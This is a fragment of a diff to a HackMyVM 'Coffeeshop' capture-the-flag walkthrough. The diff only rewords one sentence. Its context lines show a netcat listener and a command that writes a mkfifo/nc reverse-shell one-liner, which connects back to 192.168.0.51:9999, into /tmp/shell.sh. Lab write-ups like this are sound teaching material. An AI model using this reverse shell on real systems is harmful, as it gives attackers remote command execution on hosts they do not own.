garffff-bot/garffff-bot.github.io/content/Hackmyvm/Easy/Coffeeshop.md

 Listening on 0.0.0.0 9999
 ```

-Echo the MSFVenom payload to a file in the `/tmp` directory and make it executable:
+Echoing the msfvenom payload to a file in the `/tmp` directory and make it executable:

 ```bash
 tuna@coffee-shop:~$ echo 'mkfifo /tmp/kdiw; nc 192.168.0.51 9999 0</tmp/kdiw | /bin/sh >/tmp/kdiw 2>&1; rm /tmp/kdiw' > /tmp/shell.sh